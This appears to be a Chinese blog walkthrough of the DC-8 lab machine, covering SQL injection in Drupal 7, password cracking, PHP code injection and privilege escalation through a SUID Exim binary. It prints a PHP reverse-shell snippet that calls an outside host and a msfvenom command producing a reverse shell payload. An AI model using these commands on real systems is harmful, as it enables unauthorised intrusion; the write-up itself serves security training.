标签:无法登录 程序 shell lag 经验 esc 搜集 strong 使用
端口扫描,发现只开放了80和22端口,80端口透露出的信息判断CMS为Drupal7.
访问80端口页面
一顿瞎点之后发现页面上方的导航栏和左侧的导航栏指向地址不同,而且存在sql注入。
sqlmap一把梭,因为mysql端口并没有暴露在外边,数据库中只有drupal的内容,因此将方向确定为获取drupal的用户口令。
整理之后得到用户名和对应hash内容,利用john爆破得到john用户密码 (这个用户名应该算是提示吧)
和之前的DC7不一样,这个用户的权限比较低,只能修改页面内容,对每个功能进行尝试的时候发现一个可以插入php代码的地方。
但是测试并没有效果,返回的是修改之前默认的内容,一顿瞎试也没解决,网上也没找到相关信息(可能是姿势不对)
最后参照网上其他的walkthrough,发现需要在php代码之前添加其他字符
获得服务器相关信息,但是尝试通过sqlmap向web目录下写文件失败,尝试使用php代码直接构造webshell,因为看起来代码执行的结果是直接包含在drupal页面中的,因此考虑使用回连式shell。
<?php
$sock=fsockopen("公网IP",端口);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
使用msf生成回连shell,这个代码在执行的时候页面是一直处在加载状态的
msfvenom -p php/reverse_php LHOST=10.0.2.15 LPORT=8888 -f raw -o reshell.php
鸟枪换炮
使用LinEnum.sh查看相关信息
内核信息:Linux dc-8 4.9.0-4-amd64 #1 SMP Debian 4.9.51-1 (2017-09-28) x86_64 GNU/Linux
全局可写文件也没有什么特殊的
在当前进程中看到了一个不同寻常的程序:exim4具有SUID
exim4
exim4:
Exim4是在剑桥大学开发的另一种消息传输代理(MTA),用于在连接到Internet的Unix系统上使用。 尽管exim的配置与sendmail的配置完全不同,但是可以安装Exim代替sendmail。
确认版本
相关漏洞
由于我的msf框架比较老,没收录这个,同时又不想放弃已经搞下来的shell,因此选择尝试Exim 4.87 - 4.91 - Local Privilege Escalation
尝试提权脚本
检查了一下,是Windows换行符的问题,使用vim打开文件后:set ff=unix保存即可
第一次执行失败,尝试代码中提示的第二种方法,成功提权。
成功读取flag.txt
标签:无法登录 程序 shell lag 经验 esc 搜集 strong 使用
原文地址:https://www.cnblogs.com/ph1sh/p/12170658.html
